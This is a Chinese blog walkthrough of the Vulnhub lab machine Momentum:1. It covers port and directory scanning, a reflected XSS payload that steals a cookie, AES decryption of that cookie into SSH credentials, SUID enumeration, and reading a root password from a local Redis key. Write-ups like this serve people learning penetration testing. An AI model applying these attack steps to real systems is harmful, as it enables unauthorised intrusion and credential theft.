【Vulnhub】Monmentum:1

【Vulnhub】Monmentum:1

信息收集

fscan 扫描内网靶机ip

image-20241120135354182

确定目标 IP 为:192.168.1.6

nmap 扫描目标IP全端口服务

nmap -A -sV -p- 192.168.1.6

image-20241120140520524

发现目标开放端口 22 和 80 服务

对 80 端口进行目录扫描

dirsearch -u http://192.168.1.6

image-20241120141042124

看到 /js/ 目录下有 main.js 文件

image-20241121172738622

点开

image-20241121172830626

发现 viewDetails 函数有 href 参数格式,以及AES加密密钥:SecretPassphraseMomentum

将 href 加参数 访问一下 http://192.168.1.6/opus-details.php?id=111111 试试。

image-20241121174050612

那么这里应该是有xss反射性漏洞的

漏洞利用

设计 payload 为:<script>alert(document.cookie)</script>

image-20241121174253533

ok,弹出cookie为 U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt

之前在 main.js 页面我们得知 AES 的密钥,那么解密一下

image-20241121175019620

得到真正的cookie值:auxerre-alienum##(一般包含账号密码)

使用 ssh 连接,猜到账号密码为:auxerre / auxerre-alienum##,连接成功

image-20241121175520744

ls
cat user.txt

拿到 user 的 flag

image-20241121175642092

提权

查看 id ,sudo -l 和 find / -perm -4000 -type f 2>/dev/null 查看权限和可用的 SUID 文件

id
sudo -l
find / -perm -4000 -type f 2>/dev/null

image-20241122092655804

查定时任务

crontab -l

image-20241122093827881

查看端口

ss -ntlup

image-20241122094119197

发现本地监听了 6379 端口,也就是开了 redis 服务

客户端连接,查看

redis-cli
keys *
get rootpass

image-20241122094312180

得到 root 密码 m0mentum-al1enum##

image-20241122094424106

切换 root 用户成功

拿到 root 用户的 flag

image-20241122094453483

posted @ 2024-11-22 17:14  酷比灯  阅读(11)  评论(0)    收藏  举报